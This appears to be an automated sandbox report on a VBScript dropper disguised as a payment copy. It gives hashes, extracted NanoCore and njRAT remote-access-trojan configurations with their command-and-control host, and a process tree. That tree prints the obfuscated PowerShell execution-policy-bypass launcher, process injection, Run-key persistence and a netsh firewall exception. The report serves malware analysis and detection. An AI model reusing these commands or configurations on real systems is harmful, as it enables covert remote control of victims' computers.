Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
18-11-2021 19:18
Static task
static1
Behavioral task
behavioral1
Sample
J3m1a_Payment_Copy.vbs
Resource
win7-en-20211014
General
-
Target
J3m1a_Payment_Copy.vbs
-
Size
2KB
-
MD5
69cb30fd3d94cfcc7c89a1f41a47d8dd
-
SHA1
5cc7c867d8b5238fa7ad4718c5ba5d105e72cd22
-
SHA256
6cb5a93eec2726f651d8a61a9e865d46a93324992d9a2467edb6b83b64789985
-
SHA512
02a96d4ecfda83233a557ac3cf94629ee251ed9ecef775bd697d371091c5c03fb48aacb4640770fdd9fd097f1cd118b62053c0f26183e08062ede68a6c4b8d5a
Malware Config
Extracted
nanocore
1.2.2.0
jamcav.duckdns.org:6746
9bb8b571-1a08-4fb2-8447-a1da0968f2fa
-
activate_away_mode
true
-
backup_connection_host
jamcav.duckdns.org
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-08-20T15:54:30.577245636Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
6746
-
default_group
jam
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
9bb8b571-1a08-4fb2-8447-a1da0968f2fa
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
jamcav.duckdns.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 12 2428 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
GoogleCrashHandler.exepid process 316 GoogleCrashHandler.exe -
Modifies Windows Firewall 1 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
jsc.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\jsc.exe\" .." jsc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\jsc.exe\" .." jsc.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 2428 set thread context of 1168 2428 powershell.exe jsc.exe PID 2428 set thread context of 1752 2428 powershell.exe jsc.exe PID 2428 set thread context of 3908 2428 powershell.exe jsc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exejsc.exepid process 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 2428 powershell.exe 2428 powershell.exe 2428 powershell.exe 1168 jsc.exe 1168 jsc.exe 1168 jsc.exe 1168 jsc.exe 1168 jsc.exe 1168 jsc.exe 1168 jsc.exe 1168 jsc.exe 1168 jsc.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
jsc.exepid process 1168 jsc.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
powershell.exepowershell.exejsc.exejsc.exedescription pid process Token: SeDebugPrivilege 2624 powershell.exe Token: SeDebugPrivilege 2428 powershell.exe Token: SeDebugPrivilege 1168 jsc.exe Token: SeDebugPrivilege 3908 jsc.exe Token: 33 3908 jsc.exe Token: SeIncBasePriorityPrivilege 3908 jsc.exe Token: 33 3908 jsc.exe Token: SeIncBasePriorityPrivilege 3908 jsc.exe Token: 33 3908 jsc.exe Token: SeIncBasePriorityPrivilege 3908 jsc.exe Token: 33 3908 jsc.exe Token: SeIncBasePriorityPrivilege 3908 jsc.exe Token: 33 3908 jsc.exe Token: SeIncBasePriorityPrivilege 3908 jsc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
jsc.exepid process 1752 jsc.exe -
Suspicious use of WriteProcessMemory 34 IoCs
Processes:
WScript.exepowershell.exepowershell.exejsc.exejsc.exedescription pid process target process PID 2476 wrote to memory of 2624 2476 WScript.exe powershell.exe PID 2476 wrote to memory of 2624 2476 WScript.exe powershell.exe PID 2624 wrote to memory of 2428 2624 powershell.exe powershell.exe PID 2624 wrote to memory of 2428 2624 powershell.exe powershell.exe PID 2428 wrote to memory of 1168 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 1168 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 1168 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 1168 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 1168 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 1168 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 1168 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 1168 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 1752 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 1752 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 1752 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 1752 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 1752 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 1752 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 1752 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 1752 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 3908 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 3908 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 3908 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 3908 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 3908 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 3908 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 3908 2428 powershell.exe jsc.exe PID 2428 wrote to memory of 3908 2428 powershell.exe jsc.exe PID 1752 wrote to memory of 316 1752 jsc.exe GoogleCrashHandler.exe PID 1752 wrote to memory of 316 1752 jsc.exe GoogleCrashHandler.exe PID 1752 wrote to memory of 316 1752 jsc.exe GoogleCrashHandler.exe PID 3908 wrote to memory of 3984 3908 jsc.exe netsh.exe PID 3908 wrote to memory of 3984 3908 jsc.exe netsh.exe PID 3908 wrote to memory of 3984 3908 jsc.exe netsh.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\J3m1a_Payment_Copy.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cc = 'by------------s'.Replace('------------','pas');$bb = '-ex++++++++++++++++icy'.Replace('++++++++++++++++','ecutionpol');$aa = '-no--------------le'.Replace('--------------','profi');$dd = 'C:\Us<<<<<<<<<>>>>>>>>>ar.ps1'.Replace('<<<<<<<<<>>>>>>>>>','ers\Public\Downloads\HB');$Run = 'Powers-----------------dd'.Replace('-----------------','hell $aa $bb $cc -file $');($Run -Join '')|&('I'+'eX')2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -file C:\Users\Public\Downloads\HBar.ps13⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe"C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe"5⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" "jsc.exe" ENABLE5⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
114c93321b801971f69ed35cb9226f35
SHA169e07353153eacf0b9a820275b77cfb13b6178a1
SHA256bc46b8ab4da03c0560566812bec2c237a8fd57b7004f92f50d7bd82b6bef1f51
SHA5123ea774041f95edf6854aa1ca363c3b8453c3fb979340e3d5338c33773d79da0179bc0ac5d2d4bac251d06466ef1bc7695d8ef3167b8db58c0c8d6c1c5e1ca9a3
-
C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exeMD5
f1feead2143c07ca411d82a29fa964af
SHA12198e7bf402773757bb2a25311ffd2644e5a1645
SHA2568f2800ac8af72e8038e146b3988a30651952f20ed6cdf7be3ae4709fbb026af1
SHA512e7e2266ec862a793da7cea01c926b7a874453cf2efb0b4b77776c26042dc2ded74f17c390fad97bd2d8c0c4971a1b9d9e6c705a13edbc9e48570922e5e6cc9df
-
C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exeMD5
f1feead2143c07ca411d82a29fa964af
SHA12198e7bf402773757bb2a25311ffd2644e5a1645
SHA2568f2800ac8af72e8038e146b3988a30651952f20ed6cdf7be3ae4709fbb026af1
SHA512e7e2266ec862a793da7cea01c926b7a874453cf2efb0b4b77776c26042dc2ded74f17c390fad97bd2d8c0c4971a1b9d9e6c705a13edbc9e48570922e5e6cc9df
-
C:\Users\Public\Downloads\HBar.ps1MD5
337541d9757cb9a63d85337a2f1a4f27
SHA1377ed9d80c26e3d0f3d6f943fa773a3ff83fe242
SHA256867cca9a95ed015d4a227078782bf495af80c6101d0085eddcfe8aecc6284bef
SHA5129e98ac416efd807434386942b6f3fb938a384479a0703e89324b769053eaf72ecd609cc826f172227ad93e7efd5e90caeb0ebca939bbec53981244013bb31031
-
memory/316-202-0x000000007F460000-0x000000007F461000-memory.dmpFilesize
4KB
-
memory/316-200-0x00000000006F0000-0x00000000006F1000-memory.dmpFilesize
4KB
-
memory/316-192-0x0000000000000000-mapping.dmp
-
memory/1168-182-0x0000000005E00000-0x0000000005E03000-memory.dmpFilesize
12KB
-
memory/1168-172-0x0000000004F20000-0x0000000004F21000-memory.dmpFilesize
4KB
-
memory/1168-163-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/1168-181-0x0000000005170000-0x0000000005189000-memory.dmpFilesize
100KB
-
memory/1168-180-0x0000000005160000-0x0000000005165000-memory.dmpFilesize
20KB
-
memory/1168-164-0x000000000041E792-mapping.dmp
-
memory/1168-167-0x0000000005400000-0x0000000005401000-memory.dmpFilesize
4KB
-
memory/1168-194-0x0000000004F00000-0x00000000053FE000-memory.dmpFilesize
5.0MB
-
memory/1168-170-0x0000000004F00000-0x00000000053FE000-memory.dmpFilesize
5.0MB
-
memory/1168-169-0x0000000005040000-0x0000000005041000-memory.dmpFilesize
4KB
-
memory/1168-168-0x0000000004FA0000-0x0000000004FA1000-memory.dmpFilesize
4KB
-
memory/1752-173-0x0000000000400000-0x0000000000418000-memory.dmpFilesize
96KB
-
memory/1752-174-0x00000000004123BE-mapping.dmp
-
memory/1752-193-0x0000000004F60000-0x000000000545E000-memory.dmpFilesize
5.0MB
-
memory/2428-136-0x000001F623A00000-0x000001F623A02000-memory.dmpFilesize
8KB
-
memory/2428-146-0x000001F623A00000-0x000001F623A02000-memory.dmpFilesize
8KB
-
memory/2428-150-0x000001F623A00000-0x000001F623A02000-memory.dmpFilesize
8KB
-
memory/2428-151-0x000001F625846000-0x000001F625848000-memory.dmpFilesize
8KB
-
memory/2428-152-0x000001F623A00000-0x000001F623A02000-memory.dmpFilesize
8KB
-
memory/2428-162-0x000001F625860000-0x000001F625864000-memory.dmpFilesize
16KB
-
memory/2428-144-0x000001F625843000-0x000001F625845000-memory.dmpFilesize
8KB
-
memory/2428-143-0x000001F625840000-0x000001F625842000-memory.dmpFilesize
8KB
-
memory/2428-141-0x000001F623A00000-0x000001F623A02000-memory.dmpFilesize
8KB
-
memory/2428-140-0x000001F623A00000-0x000001F623A02000-memory.dmpFilesize
8KB
-
memory/2428-138-0x000001F623A00000-0x000001F623A02000-memory.dmpFilesize
8KB
-
memory/2428-137-0x000001F623A00000-0x000001F623A02000-memory.dmpFilesize
8KB
-
memory/2428-135-0x000001F623A00000-0x000001F623A02000-memory.dmpFilesize
8KB
-
memory/2428-191-0x000001F623A00000-0x000001F623A02000-memory.dmpFilesize
8KB
-
memory/2428-134-0x0000000000000000-mapping.dmp
-
memory/2624-128-0x000001CEEEFD0000-0x000001CEEEFD1000-memory.dmpFilesize
4KB
-
memory/2624-125-0x000001CEEED43000-0x000001CEEED45000-memory.dmpFilesize
8KB
-
memory/2624-133-0x000001CED4E10000-0x000001CED4E12000-memory.dmpFilesize
8KB
-
memory/2624-119-0x000001CED4E10000-0x000001CED4E12000-memory.dmpFilesize
8KB
-
memory/2624-201-0x000001CEEED46000-0x000001CEEED48000-memory.dmpFilesize
8KB
-
memory/2624-118-0x0000000000000000-mapping.dmp
-
memory/2624-127-0x000001CED4E10000-0x000001CED4E12000-memory.dmpFilesize
8KB
-
memory/2624-126-0x000001CED4E10000-0x000001CED4E12000-memory.dmpFilesize
8KB
-
memory/2624-124-0x000001CEEED40000-0x000001CEEED42000-memory.dmpFilesize
8KB
-
memory/2624-129-0x000001CED4E10000-0x000001CED4E12000-memory.dmpFilesize
8KB
-
memory/2624-198-0x000001CED4E10000-0x000001CED4E12000-memory.dmpFilesize
8KB
-
memory/2624-123-0x000001CEEECF0000-0x000001CEEECF1000-memory.dmpFilesize
4KB
-
memory/2624-122-0x000001CED4E10000-0x000001CED4E12000-memory.dmpFilesize
8KB
-
memory/2624-121-0x000001CED4E10000-0x000001CED4E12000-memory.dmpFilesize
8KB
-
memory/2624-120-0x000001CED4E10000-0x000001CED4E12000-memory.dmpFilesize
8KB
-
memory/3908-185-0x000000000040BBCE-mapping.dmp
-
memory/3908-184-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/3908-204-0x00000000054C0000-0x00000000059BE000-memory.dmpFilesize
5.0MB
-
memory/3984-203-0x0000000000000000-mapping.dmp